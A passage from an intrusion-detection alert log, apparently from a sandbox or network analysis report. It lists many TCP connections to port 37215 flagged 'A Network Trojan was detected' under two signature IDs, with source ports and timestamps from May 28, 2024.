                  Source Port:39192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.658013
                  SID:2829579
                  Source Port:40102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323176
                  SID:2835222
                  Source Port:33614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770798
                  SID:2835222
                  Source Port:36066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587968
                  SID:2829579
                  Source Port:54712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651203
                  SID:2829579
                  Source Port:52562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651140
                  SID:2835222
                  Source Port:40210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586922
                  SID:2829579
                  Source Port:60658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771543
                  SID:2835222
                  Source Port:52956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276793
                  SID:2829579
                  Source Port:40802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.588834
                  SID:2829579
                  Source Port:54344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887996
                  SID:2829579
                  Source Port:42544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628152
                  SID:2829579
                  Source Port:56252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.881155
                  SID:2835222
                  Source Port:60062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781177
                  SID:2829579
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695733
                  SID:2829579
                  Source Port:35434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768715
                  SID:2829579
                  Source Port:45434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797047
                  SID:2835222
                  Source Port:57578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.604126
                  SID:2829579
                  Source Port:37928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.719199
                  SID:2829579
                  Source Port:44414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775790
                  SID:2829579
                  Source Port:52470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279347
                  SID:2829579
                  Source Port:59970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578931
                  SID:2829579
                  Source Port:60942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887419
                  SID:2835222
                  Source Port:34778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729788
                  SID:2829579
                  Source Port:41552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907509
                  SID:2829579
                  Source Port:54664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536598
                  SID:2829579
                  Source Port:38022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650828
                  SID:2835222
                  Source Port:49354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766209
                  SID:2835222
                  Source Port:54464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276811
                  SID:2835222
                  Source Port:57352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719364
                  SID:2829579
                  Source Port:54856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.588088
                  SID:2835222
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649844
                  SID:2829579
                  Source Port:57380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923134
                  SID:2835222
                  Source Port:52342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696079
                  SID:2835222
                  Source Port:56766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.925761
                  SID:2835222
                  Source Port:55952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659932
                  SID:2835222
                  Source Port:34168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.801749
                  SID:2835222
                  Source Port:59622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745922
                  SID:2835222
                  Source Port:57434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786406
                  SID:2829579
                  Source Port:53130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659293
                  SID:2835222
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576140
                  SID:2835222
                  Source Port:33928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531413
                  SID:2835222
                  Source Port:34516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696637
                  SID:2829579
                  Source Port:59824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.879973
                  SID:2835222
                  Source Port:41438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.661157
                  SID:2835222
                  Source Port:34874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908590
                  SID:2829579
                  Source Port:38950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312665
                  SID:2835222
                  Source Port:44436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586331
                  SID:2835222
                  Source Port:46144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942539
                  SID:2835222
                  Source Port:33136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628371
                  SID:2835222
                  Source Port:34330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543128
                  SID:2835222
                  Source Port:38602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790509
                  SID:2829579
                  Source Port:35036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.701058
                  SID:2829579
                  Source Port:55820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750094
                  SID:2835222
                  Source Port:59462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789784
                  SID:2829579
                  Source Port:36964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555545
                  SID:2835222
                  Source Port:50382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312314
                  SID:2835222
                  Source Port:35060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788080
                  SID:2835222
                  Source Port:33930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.914378
                  SID:2835222
                  Source Port:39488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583606
                  SID:2829579
                  Source Port:42508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.877020
                  SID:2835222
                  Source Port:55488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316232
                  SID:2835222
                  Source Port:35782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.606719
                  SID:2835222
                  Source Port:36198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591288
                  SID:2829579
                  Source Port:39776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.700246
                  SID:2829579
                  Source Port:51836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278398
                  SID:2835222
                  Source Port:41292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283826
                  SID:2829579
                  Source Port:34892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583751
                  SID:2829579
                  Source Port:42696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.531568
                  SID:2835222
                  Source Port:42018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771452
                  SID:2829579
                  Source Port:41434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547422
                  SID:2835222
                  Source Port:59024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278881
                  SID:2829579
                  Source Port:41662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738141
                  SID:2835222
                  Source Port:36750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.454798
                  SID:2835222
                  Source Port:34368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767880
                  SID:2835222
                  Source Port:44964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788196
                  SID:2829579
                  Source Port:37162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695667
                  SID:2829579
                  Source Port:34634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767742
                  SID:2829579
                  Source Port:34408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277647
                  SID:2829579
                  Source Port:46220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649329
                  SID:2829579
                  Source Port:50756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546842
                  SID:2835222
                  Source Port:56124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279408
                  SID:2835222
                  Source Port:38606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904733
                  SID:2829579
                  Source Port:40780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930394
                  SID:2829579
                  Source Port:58188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.909319
                  SID:2829579
                  Source Port:58408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278043
                  SID:2829579
                  Source Port:48374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316498
                  SID:2835222
                  Source Port:51310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.866329
                  SID:2835222
                  Source Port:44962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.453747
                  SID:2829579
                  Source Port:34414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655664
                  SID:2835222
                  Source Port:43178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745980
                  SID:2835222
                  Source Port:42064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790355
                  SID:2835222
                  Source Port:54158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942559
                  SID:2835222
                  Source Port:59412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809969
                  SID:2829579
                  Source Port:39638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536613
                  SID:2829579
                  Source Port:60888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316759
                  SID:2835222
                  Source Port:51710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629670
                  SID:2829579
                  Source Port:59344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729788
                  SID:2835222
                  Source Port:41552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.608543
                  SID:2835222
                  Source Port:50808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591419
                  SID:2829579
                  Source Port:39244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695774
                  SID:2835222
                  Source Port:48042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713750
                  SID:2829579
                  Source Port:43774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.719210
                  SID:2835222
                  Source Port:47230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664634
                  SID:2829579
                  Source Port:45594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529769
                  SID:2835222
                  Source Port:49028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846085
                  SID:2829579
                  Source Port:50920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790206
                  SID:2835222
                  Source Port:51928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907361
                  SID:2829579
                  Source Port:44034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920471
                  SID:2835222
                  Source Port:44628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661550
                  SID:2829579
                  Source Port:43158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.881219
                  SID:2835222
                  Source Port:40290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.590429
                  SID:2829579
                  Source Port:45650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790526
                  SID:2835222
                  Source Port:42252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542775
                  SID:2829579
                  Source Port:54552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.785609
                  SID:2829579
                  Source Port:41592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846642
                  SID:2829579
                  Source Port:34532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312356
                  SID:2829579
                  Source Port:42172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796696
                  SID:2829579
                  Source Port:55150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660694
                  SID:2835222
                  Source Port:58032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649809
                  SID:2835222
                  Source Port:38276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527428
                  SID:2829579
                  Source Port:42292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796800
                  SID:2829579
                  Source Port:50542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586989
                  SID:2829579
                  Source Port:60044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577860
                  SID:2829579
                  Source Port:42928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765436
                  SID:2835222
                  Source Port:47864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316324
                  SID:2835222
                  Source Port:41386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907644
                  SID:2829579
                  Source Port:51624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775870
                  SID:2829579
                  Source Port:41064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316377
                  SID:2835222
                  Source Port:34686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.781217
                  SID:2835222
                  Source Port:39070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874526
                  SID:2835222
                  Source Port:52304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629270
                  SID:2829579
                  Source Port:42722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493445
                  SID:2835222
                  Source Port:58342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496430
                  SID:2835222
                  Source Port:48342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.610879
                  SID:2835222
                  Source Port:58594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530587
                  SID:2835222
                  Source Port:51384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578678
                  SID:2829579
                  Source Port:37272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664401
                  SID:2829579
                  Source Port:43188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789786
                  SID:2829579
                  Source Port:49574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488783
                  SID:2829579
                  Source Port:60216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781010
                  SID:2829579
                  Source Port:53034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888596
                  SID:2835222
                  Source Port:41142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563486
                  SID:2835222
                  Source Port:60336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849002
                  SID:2835222
                  Source Port:52852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.890091
                  SID:2829579
                  Source Port:48210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793579
                  SID:2829579
                  Source Port:60838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719890
                  SID:2835222
                  Source Port:38502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888419
                  SID:2835222
                  Source Port:41172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536590
                  SID:2829579
                  Source Port:45126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888630
                  SID:2829579
                  Source Port:60380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492083
                  SID:2835222
                  Source Port:38472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.794518
                  SID:2835222
                  Source Port:39182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537474
                  SID:2835222
                  Source Port:55974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.771397
                  SID:2835222
                  Source Port:46538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912093
                  SID:2829579
                  Source Port:56942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578052
                  SID:2835222
                  Source Port:36054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586407
                  SID:2835222
                  Source Port:37484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651780
                  SID:2835222
                  Source Port:53184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766599
                  SID:2829579
                  Source Port:48628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781097
                  SID:2835222
                  Source Port:39680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627931
                  SID:2829579
                  Source Port:38620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886188
                  SID:2829579
                  Source Port:54078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696052
                  SID:2829579
                  Source Port:45304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.818010
                  SID:2835222
                  Source Port:51638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546488
                  SID:2835222
                  Source Port:46220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536736
                  SID:2829579
                  Source Port:37794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788017
                  SID:2829579
                  Source Port:44364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.323449
                  SID:2829579
                  Source Port:52806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545267
                  SID:2829579
                  Source Port:34642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837137
                  SID:2835222
                  Source Port:35142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594012
                  SID:2835222
                  Source Port:34714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887331
                  SID:2829579
                  Source Port:59082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767772
                  SID:2829579
                  Source Port:54692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657687
                  SID:2835222
                  Source Port:47178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546769
                  SID:2835222
                  Source Port:34536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887896
                  SID:2835222
                  Source Port:42634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719441
                  SID:2829579
                  Source Port:43176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908186
                  SID:2835222
                  Source Port:55022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768667
                  SID:2829579
                  Source Port:48982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.545295
                  SID:2829579
                  Source Port:50298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775767
                  SID:2835222
                  Source Port:57870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547628
                  SID:2829579
                  Source Port:35804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870951
